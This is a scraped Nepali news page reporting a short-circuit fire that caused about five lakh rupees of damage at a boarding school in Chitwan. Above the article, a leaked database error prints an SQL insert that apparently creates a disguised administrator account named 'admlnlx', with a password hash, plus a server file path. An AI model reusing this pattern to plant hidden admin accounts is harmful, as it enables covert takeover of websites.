WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqikzNH1oCcQCZvEGlp/2oM3O0HBPH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 20:22:46', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
विद्या मेमोरियलमा आगलागि हुँदा पाँच लाखको क्षति – Gaule Khabar

विद्या मेमोरियलमा आगलागि हुँदा पाँच लाखको क्षति

विद्या मेमोरियलमा आगलागि हुँदा पाँच लाखको क्षति

चितवन, माघ १७–

चितवनको एक विद्यालयमा आगलागि हुँदा करिव ५ लाख रुपैयाँ बराबरको क्षति भएको छ ।
जिल्लाको राप्ती नगरपालिका–९ खुरखुरे स्थित विद्या मेमोरियल वोर्डिङ स्कूलमा विजुली मिटरको तार सर्ट भई अचानक आगलागी भएको थियो । आगलागिबाट २ तल्ले पक्कि भवनको माथिल्लो तल्लामा रहेको कार्यालयको कागजपत्र तथा फर्निचरसहित अन्य सामानहरु नष्ट हुँदा ५ लाख बराबरको क्षति भएको चितवन प्रहरीले जनाएको छ । प्रहरी, स्थानिय वासी र दमकलको सहयोगमा आगो नियन्त्रणमा लिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका